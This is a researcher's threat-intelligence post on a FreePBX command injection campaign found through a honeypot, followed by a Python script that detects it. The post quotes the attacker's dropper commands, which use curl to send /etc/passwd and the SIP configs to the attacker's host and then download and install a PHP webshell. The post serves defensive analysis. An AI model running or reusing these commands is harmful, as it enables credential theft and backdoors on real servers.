Found a request in my HTTP honeypot I couldn't explain. Investigation revealed it's been scanning widely and attempting to exploit a FreePBX command injection vulnerability and install a webshell.
77.247.108.81 - - [21/Sep/2021:18:54:34 -0400] "GET /gbr.php HTTP/1.1" 400 226 "-" "gbrmss/7.29.0" "ct:text/html"
Using this IP I spotted this link which showed me the form data: https://threatwar.com/attackers/695a2a8e-3cb6-4d74-8af8-d5058079a909
Based on the request there this appears to be an RCE injected via the "language" header. Exploit here: https://www.exploit-db.com/exploits/40434
From there I investigated the initial dropper:
77[.]247[.]108.42/g/?shFrPbN0=IPAPY
It's about 900 bytes long, but its hash varies per victim: the client IP is embedded in the payload and reused in the script's later requests.
The script will POST the Asterisk server config to the host:
curl -d "`cat /etc/asterisk/sip*`" "http://77[.]247.108.42/g/?d=sipConfs&i=${stIp}"
(where the variable stIp is the server's IP address, populated in the script earlier) and then attempt to upload the password file, too:
curl -d "`cat /etc/passwd`" "http://77[.]247.108.42/g/?d=etc_passwd&i=${stIp}"
The script will also download a PHP script from the server and install it as "config.php" under all web directories (after finding all writable directories under /var/www/html).
shellContent=`curl -s "77[.]247.108.42/g/?f=phFrPb&i=${stIp}"`
It also creates a new directory, "cnfg", for this PHP backdoor and writes a second copy there as "index.php":
mkdir -p /var/www/html/cnfg 2>/dev/null
echo "$shellContent" > /var/www/html/cnfg/index.php 2>/dev/null
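For anyone hunting this on their own boxes, here is a small detection script I put together from the details above (added here as an example; it is not part of the dropper or the attacker's code). It flags web-server log lines carrying the probe path and user-agent from the honeypot hit, and walks a web root for the two drop locations the script uses; the sample log lines and the tuple format are my own constructions, and the "cnfg"/config.php paths are the ones the post describes.

```python
import os
import re

# Combined log format plus the extra quoted field the honeypot logs append.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fingerprints taken from the honeypot hit: the probe path and the client's user-agent string.
PROBE_PATHS = {"/gbr.php"}
UA_PREFIX = "gbrmss/"

# Constructed sample log lines: the honeypot hit, a benign request, and the scanner UA on another path.
SAMPLE_LOG = [
    '77.247.108.81 - - [21/Sep/2021:18:54:34 -0400] "GET /gbr.php HTTP/1.1" 400 226 "-" "gbrmss/7.29.0" "ct:text/html"',
    '198.51.100.7 - - [21/Sep/2021:18:55:01 -0400] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "ct:text/html"',
    '203.0.113.9 - - [21/Sep/2021:18:56:12 -0400] "POST /admin/config.php HTTP/1.1" 302 0 "-" "gbrmss/7.29.0" "ct:text/html"',
]


def scan_log_lines(lines):
    """Return (ip, path, reason) for every line matching the scanner fingerprint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = []
        if m["path"] in PROBE_PATHS:
            reasons.append("probe path")
        if m["ua"].startswith(UA_PREFIX):
            reasons.append("scanner user-agent")
        if reasons:
            hits.append((m["ip"], m["path"], ", ".join(reasons)))
    return hits


# Drop locations described in the post: config.php in writable web dirs and <dir>/cnfg/index.php.
# FreePBX ships its own admin/config.php, so hits are triage candidates, not verdicts.
def find_dropped_files(webroot):
    """Walk webroot and return (path, mtime) for files matching the dropper's install pattern."""
    found = []
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            in_cnfg = os.path.basename(dirpath) == "cnfg" and name == "index.php"
            if in_cnfg or (name == "config.php" and os.access(dirpath, os.W_OK)):
                found.append((full, int(os.path.getmtime(full))))
    return sorted(found)
```

Run find_dropped_files against /var/www/html and compare the mtimes of any config.php hits with your last legitimate deployment; the Yara rule is the better signal for the file contents themselves.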
A Yara rule is enclosed, too, to detect the webshell (TLP:GREEN).
Happy hunting.